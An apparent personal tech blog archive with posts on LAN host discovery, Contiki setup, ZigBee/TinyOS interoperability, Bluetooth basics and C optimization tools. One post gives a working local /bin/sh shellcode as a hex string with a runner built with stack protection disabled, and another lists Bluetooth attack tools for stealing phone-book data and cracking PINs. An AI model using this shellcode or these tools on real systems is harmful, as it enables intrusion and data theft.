Wednesday 17 December 2014

IP alives in Local Networks


Platform :  Ubuntu  Linux  ,  But  its  works  all   linux  Variant

                           How  to  find  the  IP  available  in   you  local  network.  Its pretty  much  if   you  are  firewall  is  not  blocking  you .   Here  i  have  one  solution  to  find  the  IP  address   and  Mac  address  in  you  local  network.

   Try  to  download  the  "fping"  packages  from  the   repo
 
           sudo  apt-get  install  fping



Type  the  first command
       
        fping   -g    <range  starts here>    to    <range  end here>

     eg  :   fping   -g  192.167.0.0     192.167.255.255

         fping    send  a   halfway  ping  to  request  to  all  the  machine  in  your  local  network. Only  the  alive  machine will  give response  to this  mass  ping

Type  the  Second  command

       arp  -v  or  arp  -a

   You will  get  the  all  IP  or  hostane  ,  Mac  Address   and  interface  of  the  machine.


   By  using  an  appropriate  shell-script  we  can  save  these  data  in  to  the  database (Its  necessary) .  When   we  are  going  to   mass  ping , ARP Cache table  fill  with machine  entries .  this  will  clear  at  certain  point..  On  that  time...  we  could  not    get  the  data.

  Use  Scripts  and  Enjoy....




Wednesday 5 November 2014

Contki and Cooja Installation in Ubuntu


        Contki is a Wireless Sensor Device  OS  is  to build  small  nodes  in Wireless Sensor Network. It is  very easy to port on any embedded resource constrained devices. If you are  working on Internet of Things  like application , this OS  is very  much  suitable  for build a Sensor node  application  on it.How  to  install contki OS  and its simulator  in Ubuntu Machine to  develop  Sensor Application  is  given below. ?.. try  it..

1.Install  the  following  packages  through  the apt  command

  sudo apt-get install build-essential binutils-msp430 gcc-msp430  msp430-libc binutils-avr gcc-avr gdb-avr avr-libc  avrdude openjdk-7-jdk openjdk-7-jre ant libncurses5-dev  doxygen git 
 
2.Clone  the development  packages  of  the contiki.
 
        git clone git://github.com/contiki-os/contiki.git contiki
 
3.Got  to  contiki directory  and  run make  command  and  run output  file. 
cd contiki-2.6/examples/hello-world 
make TARGET=native
./hello-world.native
4. How  to run contiki OS on micaz  mote.? Usually  micaz  mote  with  Tiny OS, but here  we  can possible to  port  the  contiki  OS  in  micaz  mote.

 make TARGET=micaz savetarget
 make hello-world.upload
 make TARGET=micaz hello-world.upload PORT=/dev/ttyUSB0


4.Running Network  Simulator  Cooja.

     Start  Cooja  ,  Its  a network simulator  for  testing  the  sensor network and  its  running  parameter.  Its  very  suitable  for build a  small  sensor  network  simulator.

cd   contki/toola/cooja
ant  run

 If  you  got  any error  while  run  the  ant  command  juts  update  the  git  clone by using  the  following   command.

git submodule update --init

5.Cooja  Network  Simulator  Window  Appears.
Cooja Open  Window
Create a Simulation
New  Simulation Window
Choose  Mote
Select  a  mote  from the  list
Compile  the  mote
Select  the  no  of motes one

One  mote  is  added  to  window
Again  Select 20  node on elliptical  topology
20  nodes are  added  to window
Start the simulation
Show its  range  and  connection  paradigm
Simulation Pattern





Simulation of  mote  ant  random    with  100  motes
Cooja Wireless  Sensor  network simulator help  to  know the sensor  motes  operator  and  its Radio  channel  allocation  and  power trace.  But  it  have  some  limitation while  implementing  large  no  of  sensor  network.

Wednesday 29 October 2014

Shellcode



How to write a simple shellcode ...?


1. A  Simple  C  program  for  /bin/sh
#include <unistd.h>

int main(int argc, char*argv[ ])
{
   char *shell[2];

   shell[0] = "/bin/sh";
   shell[1] = NULL;
   execve(shell[0], shell, NULL);
   return 0;
}
2. Type  Command
# gcc shellexpt.c -o  shellexpt

# objdump  -d   ./shellexpt


shellexpt.c  :file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0      xor     %eax, %eax
 8048076:       b0 46      mov     $0x46, %al
 8048078:       31 db      xor     %ebx, %ebx
 804807a:       31 c9      xor     %ecx, %ecx
 804807c:       eb 16      jmp     8048094 <ender>

0804807e <starter>:
 804807e:       5b         pop     %ebx
 804807f:       31 c0      xor     %eax, %eax
 8048081:       88 43 07   mov     %al, 0x7(%ebx)
 8048084:       89 5b 08   mov     %ebx, 0x8(%ebx)
 8048087:       89 43 0c   mov     %eax, 0xc(%ebx)
 804808a:       b0 0b      mov     $0xb, %al
 804808c:       8d 4b 08   lea     0x8(%ebx), %ecx
 804808f:       8d 53 0c   lea     0xc(%ebx), %edx
 8048092:       cd 80      int     $0x80

08048094 <ender>:
 8048094:       e8 e5 ff ff ff    call   804807e <starter>
 8048099:       2f                das
 804809a:       62 69 6e          bound  %ebp, 0x6e(%ecx)
 804809d:       2f                das
 804809e:       73 68             jae    8048108 <ender+0x74>
 80480a0:       4e                dec    %esi
 80480a1:       41                inc    %ecx
 80480a2:       41                inc    %ecx
 80480a3:       41                inc    %ecx
 80480a4:       41                inc    %ecx
 80480a5:       42                inc    %edx
 80480a6:       42                inc    %edx
 80480a7:       42                inc    %edx
 80480a8:       42                inc    %edx

 3. Collect  hexcode  from the asm  file

 "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
 "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
 "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
 "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
 "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
  3. Create  A  shell code  program  by using  this  hexcode
 
/*shell_exec.c*/
#include <unistd.h>

char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
              "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
              "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
              "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
              "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";

int main(int argc, char **argv)
{
/*creating a function pointer*/
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
4. Compile  and   run the  code

   #gcc  -fno-stack-protector -z execstack  shell_exec.c
    
   #./a.out
5 Result
      Get  a  /bin/sh   shell 
6. Try  more  shellcode  
  
     Jonathan Salwan's  Shellcode  database
  
Shell-code  Jonathan Salwan Database  GoTo

Shell-code  Project  Go To

Shell-code  Python Injector  Released  GoTo    Download 

Shell-code  Tutorials T1  T2

Shell-code  Exploit  DB GoTo

Tuesday 28 October 2014

XBee IEEE 802.15.4 ZigBee OEM Stack Interoperability Issues with TinyOS IEEE 802.15.4 Stack


  1.  The main Problems of porting the stack over the IEEE 802.15.4 lower layer stack is lack of specification details of hardware and software regarding important aspects of the beacon enabled mode and the cluster tree model.
  2. Synchronization Techniques in Cluster Tree Developments is an another issue. For building a cluster network, synchronization is very much required especailly between the ZR , ZC and ZED if all the devices are working under one PAN ID. Moreover , if a node is not properly sychronized there is a possiblity of collisions in the GTS slots(It provides guaranted time for each device is intent to connect to the network) : Stack Overflow is the result of this problem.
  3. XBee is a ZigBee Alliance Group devices and its using the ZigBee Compaint IEEE 802.15.4 stack for the Wireless Communication. TinyOS is not a ZigBee, but the micaz mote device we are using here is a ZigBee Alliance Group device. That doesnt means that its possible to make communication between these two, for that we need a ZigBee IEEE 802.15.4 Stack in TinyOS for building the ZigBee Protocol Stack in it.
  4. CC2420 Radio chipset which is used to switch the time for transmitting and receiving data throught radio is 192 mico seconds, that is different from the other stack , especially in allianced group devices like OEM.
  5. In addition, the processing power available in the motes microconrtoller revealed to be quite limited to comply with the most demanding IEEE 802.15.4 timing constraints, especailly from small beacon orders (BO < 3) and superframe orders (SO <3). This turns these Superframe configuration impossible to deploy, considering that the mote must also have availablity for processing other task.
  6. ZigBee Protocol stack have some processing limtation in ATMega128RF,only smarter and faster microconrtoller overcome this difficulty. Open ZB forum expect to overcome this in near future.
  7. The deafult TinyOS Scheduler does not support tasks prioritization and non pre-emptive. Typically there are two different kinds of interrupt event in TinyOS: timers and radio, these events are captured by event handler that normally post a task to the FIFO task queue, which significantly impacts the behaviour of the protcol stack.
  8. The interference between IEEE 802.15.4 and 802.15.4 radio channels , confirmed using a FFT spectrum analyser had inpredicatable effects on the resutls.
  9. Physical Layer Related problems.
  10. Interference between radio channels (Overcome the interference between these two standards by using the only IEEE 802.154. channel(channeks 26 in the 2480 MHz frequency band) that is completely outside the IEEE 802.11 frequency Spectrum).
  11. RSSI -based localization in accuracy (Problem Solved in Open ZB).
  1. Synchronized data request/ reply method used in the XBee ZigBee Alliance Group device due to accomadation of the large collection devices in the network.
  2. Timer Slot Registration techniques for a frame in TinyOS and XBee devices is have a lot of difference. Like In TinyOS , DESTINATION device is send frame to the SOURCE device is by using BROADCASTING timeslot channel. But in XBee only BROADCASTING frame is allow to pass through the channel.
  3. TinyOS does'nt have any Super Frame Scheduling Mechanism for handling multiple packet from the SOURCE Devices.
  4. The tinyos stack is NOT multi-lingual nor is it very flexible. You basically compile with a group of defines set that determines exactly what kind of packets one is interested in. This is an artifact of TinyOS motes being extremely resource constrained.
  5. TinyOS not following any accurate simulation model for IEE 802.15.4 and ZigBee protocol focusing on the Guranteed Timse Slot (GTS) mechanism and ZigBee hierarichal routing strategy in becon enabled cluster-tree Wireless Sensor Network.
  6. To implement an energy efficient beacon enabled routing mechansim in TinyOS is really a challenging task.
  7. XBee uses 16 Channels with the band gap of the 5MHz [ 2MHz] and 16 Array orthogonal DSSS for maintaing the dynamic timeslot allocation for frames from the devices.TinyOS or OpenZB doesn't have any kind of mechanism like that and its using Time Division based Frame Synchronization Techniques [TDMA].
  8. ZigBee Compliant IEEE 802.15.4 Stack is differ from depending up on its Specification and Networking Topologies.
  9. In ZigBee Wrieless Sensor Technology mainly three networking topolgies were using for costructing a sensor network. According to the current IEEE802.15.4/ZigBee specification , synchronization techniques in each toplogies is different from one another on beacon enabled mode. OpenZB forum says that, they were successfully resolve this issue by applying an Time Division Based Synchronization Techniques.
  10. OpenZB forum build ZigBee Stack top over a modified IEEE 802.15.4 in which is very much compatable with their stack. So we cant expect that this device is communicate with the exsiting ZigBee Alliance Group device like XBee.
  11. I am Stilll working on OpenZB implemenation in Micaz mote device, because vendors saying that this device is ZigBEE Alliance group device and it have OEM Modified IEEE complaint stack on its bottom layer of the stack. So it can support the ZigBEE protocol stack.
These are some issues facing while building an interoperable ZigBEE Stack over IEEE 802.15.4 -TinyOS -Micaz device. IEEE 802.15.4 ZigBEE Compliant Stack, Synchronization Scheduling Mechanism, Suitable Superframe allocation method for Avoiding the frame collision and Guranteed GTS for devices are some MAJOR ISSUES

Bluetooth Development Essential


A Short range Wireless Communication Standard for End to End device for share  the data between two ends. Like other Short range Wireless Communication  standard, Bluetooth also using an unlicensed 2.4 GHz baseband communication to  Physical Layer. It's have a protocol stack to perform an end to end  application and supports wide  range of application  in different  embedded  devices for short  range  communication . Now  it's  become  an essential  communication standard  in Smart Mobile  and  other devices in the market.  Before  Developing an  application  for  Bluetooth  we  should  have to  know  about it  very well  for  ease the  development .  

Bluetooth  version

   The Bluetooth Special Interest Group (SIG) is the body that oversees the development of Bluetooth standards and the licensing of the Bluetooth technologies and trademarks to manufacturers. The  following  are  some Bluetooth version that  we  are  currently  using  in different  sectors.
Bluetooth Protocol Stack

Baseband + Bluetooth Radio - Physical Layer Operation in Bluetooth or  transmission of data from one end to another.

LMP  -  Link  Management Protocol for to Provide a link to the application  using the Link channel and also participates  the  Multiplexing of channel using  PSM code in Link Layer.

RFCOMM -  RF Virtual COM port for Serial Communication Emulator.

BNEP  -  Bluetooth Network Encapsulation Protocol is help to provide a  network Stack to Bluetooth for doing a SEQPACKET, SOCKSTREAM socket  communication  to  device.

L2CAP - Logical  Link Control  and  Adaptation Protocol   provide a  logical  link connection to the RFCOMM and any other application layer protocol protocol  in the Stack.

OBEX  -Object Exchange Protocol. Its an application Layer protocol to perform  data  exchange  operation  between  devices.

SDP  -  Service  Discovery protocol  is  help  to  acquire  the  information of the  services run  in the  Bluetooth  device.
 
Network topology
 
   Bluetooth have one topology named "Scatternet" which help to build a bluetooth device network, but there have only few implementation is there in practical scenario.  Actually Scatternet is the collection of small net consist of 7   Bluetooth nodes called as piconet. Piconet consists of 7 nodes and each node  perform a direct link to link connection between two node. A node is the host all  other node in the network we can call it as "MASTER node" and a node is  intended to connect to the "MASTER node"  is called as SLAVE node.

Bluetooth  Development  Library

BlueZ :-
   If  you  are   using  Linux  you can  download  from  the  repo  by  using  the  command
      #sudo  apt-get  install  bluez
hcidump:-
        Promiscuous  Sniffer  for  Bluetooth
      #sudo  apt-get  install  bluez-hcidump
Bluecova  :- 
  Bluecova  is a  Java  library  for Bluetooth  Application Development  and it   runs  over  a  Java  Virtual  Machine.

Bluetooth  Hacking Tools

BlueScanner – BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device. Download BlueScan.
BlueSniff – BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices. Download BlueSniff.
BTBrowser – Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all
supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 – the Java Bluetooth specification. Download BTBrowser.
BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks. Download BTCrawler.
Hacking Bluetooth Devices
BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information. Download BlueBugger.
CIHWB – Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack. Download CIHWB.
Bluediving – Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and green plaque scanning mode. Download Bluediving.
Transient Bluetooth Environment Auditor – T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools. Download T-BEAR.
Bluesnarfer – Bluesnarfer will download the phone-book of any mobile device vulnerable toBluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data. Download Bluesnarfer.
BTcrack – BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges. Download BTcrack.
Blooover II – Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. Download Blooover II.
BlueTest – BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices. Download BlueTest.
BTAudit – BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. Download BTAuding.

Tuesday 29 July 2014

C  Code  Optimization  Tools for  Linux Programmers

                                         I  am  not  here  to  talk about   How  to  write  a  c  programming  code ..?. But  i  like  to  give some  tips  about the optimization of  code by  using minimal  tools.  Nowadays a  lot  of  tools (IDE)  can  be  available  in  market  for  Debugging  and  Optimizing   of  code. But  i  am  always  using  some  simple  tools  for  my  coding Optimization. We  all  know  that  c  is  the  basic  of  all  language,  so  most  of  the people  were  not give  clear  attention while  writing it. It  causes  a  lot  of  problem  while  it  run. Most  common   problem  is  memory  leaks, memory  allocation error,improper scaling of memory  area,padding  of  structure, Lack  of Accuracy  in   Data type  Specification. Improper programming practices, unbalanced Execution Time Flow .  Writing  a  code  is  always  a  simple  task, But  the  optimization of  that  code  is major  problem when  you  are  doing  a  program  in  HIL  (Hardware  Interface  Layer).  Optimization  of  a  code  can  be   easily  done  by  using  a  bunch  of  tools. but  Before  that  you  should  have  a  very  good  understanding  of  your  programs,  then  only  you  can  change  that  according  to  your  needs.  Each  programmer  has its-own  style   in  there  programs, me  also  .  I  am  always  uses  Direct  Memory  Addressing  Methods  in  my  programs.  That  will  helps  me  to  solve  so  many  problems before  even  optimization is  done.  DMA :-Its  a    Pointer  Addressing  Method  which  helps  to  scale  the  structured  and  no structured  memory  area  especially  when  we  are  dong  String  Operation or  Writing  code  for a Device  driver.

               I  am  here to  tell  you  only 
  few   optimization  techniques  which  commonly  uses  in  Optimization  of C codes.


1.How  to  Check  Memory Leaks  in C  Programs  ...?

Tool  :  Valgrind

         Valgrind  is  an  excellent  tools  for  Memory  leaks  checks  and  it  can easily  download  from  net  for   Linux  Machine.

:~$ sudo  apt-get  install valgrind

 :~$ valgrind   <execbinary>


Valgrind  OIptimization  Window




2.How  to Check  Execution  time  is  taken  for  each  System call  in  your  program

Tool :  Strace

          Strace  is  a  tools  which helps  you   to  know how   your   program  execution  flows  internally  in  each  system  calls and  even  can  calculate  the  time  for  each  execution of  your  instruction  in  system  calls.


2.gdb Debugger


      GDB  (GNU  Debugger )  is  the  tool  in  which  used  widely for  optimization  of  the code.This  tool  will  help  to  check  Stack  of  each  function  were  using  in  our  programs. If   you  have  a  very  good  knowledge  in  the  GDB , then  you  don't  need  any  other  tool  for  optimization  of  the  code.

Tuesday 29 October 2013